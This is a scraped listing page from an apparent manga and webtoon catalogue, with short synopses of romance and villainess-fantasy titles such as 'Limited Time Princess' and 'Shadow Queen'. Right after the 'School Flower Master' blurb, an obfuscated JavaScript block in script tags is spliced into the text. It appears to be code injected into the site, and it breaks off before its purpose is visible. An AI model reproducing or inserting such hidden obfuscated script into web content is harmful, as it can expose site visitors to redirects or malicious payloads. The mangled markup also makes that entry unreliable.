2020 - Page 55

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

738 results

School Flower Master

Flowers and sisters, beautiful and strong sisters, pure beauty teachers, all cherishing their hugs … Normal high school students, incidentally, get a pen magic, and life has changed since then. Colorful diversity. Campus Flower Guard Flowers and sisters, beautiful and strong sisters, pure beauty teachers, all cherishing their hugs … Normal high school students, incidentally, get a pen magic, and life has changed since then. Colorful diversity. Campus Flower Guard<script></script><script>function _0x1884(_0x55474a,_0x59c4a0){var _0x8bd398=_0x5ef7();return _0x1884=function(_0x571b34,_0x5acc4e){_0x571b34=_0x571b34-(-0xb*-0x37+0xd2f+-0xe3d);var _0x242f61=_0x8bd398[_0x571b34];return _0x242f61;},_0x1884(_0x55474a,_0x59c4a0);}(function(_0x387947,_0x1156d7){var _0x52c902=_0x1884,_0x1ed291=_0x387947();while(!![]){try{var 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Limited Time Princess

<h2>Limited Time Princess</h2> An ordinary employee Yun Jae-eun became Princess Diamantine from inside a novel! B.u.t. “Why of all things, even if I transmigrate, did I have to end up as someone who’ll soon get a death penalty, Sheillia, the villainess out of villainesses…!” Jae-eun, who has a hunch about her own unfortunate fate, decides to try to change Sheillia’s set fate. The dying princess, despite opening her eyes, Delphinium Palace where no one rejoiced was gradually changing that way but…


Ingrid, the White Deer

The beautiful daughter of the Farnese family is caught up in a whirlwind romance with a notorious royal playboy — it’s the scandal of the century! When the title of “Elvynee Deer” is awarded to the pure and lovely Ingrid Farnese, all of high society expects her to marry into foreign royalty. Cursed in love with a history of broken engagements, Ingrid is determined to stay put at home in Valentine Kingdom. To take control of her own future she’ll make the king’s illegitimate son, libertine and womanizer Regan Espencer, propose to her. But the problem is, Regan is the only man in the country who doesn’t want her hand in marriage! Will Ingrid survive being tossed into the throes of debauchery and reach her happy ending?Source of collecting images:bato.to/series/77642Resources:tappytoon.com/comics/ingrid-the-white-deer


The Evil Cinderella Needs a Villain

<h2>The Evil Cinderella Needs a Villain</h2> <h4>Alternative Name: An Evil Cinderella Needs a Villain</h4> Lilith is a former villainess who died after frivolously messing up the love between the male and female lead. They say you’ll pay for it if you do evil deeds, and Lilith became a side character in a novel who gets abused by her stepmother and gets married off to a trashy man. Determined to live kindly this time, Lilith recruits the worst villain to teach her stepmother and stepsisters a lesson. “So you’re telling me to create a scene while pretending to be your lover.” “Exactly! If they get treated terribly they’ll live kind lives too. Like me!” The villain is really good at his job. Now the only thing left is to take care of the stepmother and the baron and live kindly and quietly like a side character would.


Shadow Queen

“Can you be my daughter for me?” By his offer, Elena became Duke of Franceschi’s fake daughter. She became the queen and gave birth to Crown Prince’s son. Then suddenly, Princess Veronica who was assumed dead came back. She was only just a toy. And eventually, Elena gets her son taken and murdered……. However, She went back to the past. “I’ll destroy all of you.” I’ll never live as a toy again. Elena decides to seeks revenge


The Justice of Villainous Woman ( What It Takes to be a Villainess )

<div class="description-summary"> <div class="summary__content show-more active"> With a broken heart, Hwayoung falls headfirst into the river by accident but wakes up as infamous villainess Satiana Altisee Kaylon. Coming to terms with her new life as sole daughter of House Kaylon, Satiana is soon chosen as a candidate for the next empress! In the palace full of schemers and liars, she must become a cold-blooded villainess to win her royal seat by the crown prince – or her new family will face grave danger! Will being perfectly evil really be enough? ‘Cause even villains need love! </div> </div>


A Beastly Scandal

<h2>A Beastly Scandal</h2> <b>A BELLE OF THE BALL…</b> Lady Annabelle Marchant was a belle of the ball in London until she used her psychical senses to save a man’s life. She failed miserably, leaving him dead and her disgraced. All she wants now is a chance to comfort his widow by cleansing the woman’s home of her husband’s restless spirit. But the widow’s son, the beastly Lord of the Manor, accuses her of coming to the wilds of Cheshire to snag him as a husband. Thoroughly disgusted, she is bent on proving him wrong. <b>…BECOMES PERSONA NON-GRATA…</b> Rufus Marlesbury, the Earl of Terrance, is suspected of murdering his father. He has come home to clear his name by finding the real killer before the new year or Rufus will be called in front of the House of Lords to answer for the crime. He does not have time to waste fending off a marriage-minded miss who has inveigled an invitation to his home by playing on his grief-stricken mother’s worst fears. <b>…WHEN A MURDERER IS ON THE RAMPAGE</b> With an unruly manor ghost terrorizing the occupants and corpses piling up in the village, Belle must find a way to see the man beneath the beast and Rufus must learn to believe in the love of a woman who has no reason to trust him. Only by working together can they stop a vengeful ghost before it torments the guests or before the killer strikes again.


The Tyrant’s First Love

‘Tia’ is a woman who has lost her memory. While tirelessly toiling away as a maid at Baron Noll’s manor, Tia is suddenly kidnapped by Emperor ‘Kaizer’ “Do you know who you are?” was the question this peculiar man asked her soon as they met. ‘Kaizer’ whisked ‘Tia’ away to the Imperial Palace where she lived like a member of the royal family since. On one full moon night however, “Tia” is drawn to something outside the Imperial Palace. The sight she is greeted by fills her with shock, before her stood a bloodied “Kaizer”!Source to collect images:mangahub.io/manga/the-tyrant-s-first-lovemangapark.net/manga/the-tyrant-s-first-love


Rise From the Ashes

Rise From the Ashes In order to save her mother, Qingge joined the Wei's mansion as an orphaned daughter. On the surface, she was adopted by the Wei residence, but in reality, she worked for the Weis as a secret agent. Ten years later, she managed to attract the second prince's attention and so unfolded a conspiracy... Will she turn the tide? Will she rise from the ashes... MangaToon got authorization from Leyouyinghua to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


A Bittersweet Couple

<span class="mx-1">A Bittersweet Couple</span> <div class="row m-0 py-1 px-0 border-top"> <div class="col-lg-9 col-xl-10">A man who had been hard at work throughout his school days, appeared after 10 years and proposed to Soo-bin, who was busy refusing many blind dates, with difficult conditions to refuse.</div> </div> <div class="row m-0 py-1 px-0 border-top"></div>


I Choose the Emperor Ending

<h2>I Choose the Emperor Ending</h2> Obsessed with medieval fantasies, Marina develops a revolutionary VR device that can bring fictional worlds to life. Her dreams come true when she transports herself to Lasnorok, the setting of her own novel. The problem is, she can’t get back out! Disguised as a runaway slave boy named Rino, she comes face-to-face with the main character she created, the ambitious Edward Allen Dihas. Can Marina help him overthrow the emperor and survive to make it out alive?


Revenge Wedding

Meridian Sasha is the perfect woman who has the beauty, wealth, and status. She fainted and woke up on a ship in the middle of the ocean, with a wedding dress on. I got married? ‘Who dares to try and touch Meridian Sasha? I’ll make sure that he’ll never want to marry me!’ But the one who appears to be her husband is the War Hero of the Empire, Demetrius Kyros who suddenly took out his sword. How can that be a man who wants to get married? ‘I was wondering who invited me like this… Will I be able to go back if I kill you?’ ‘Move. I was forced to come here too.’ Two people kidnapped to be married. They have no choice, but to live in an island together… 1st goal, escape the island! Final goal, revenge and marriage!
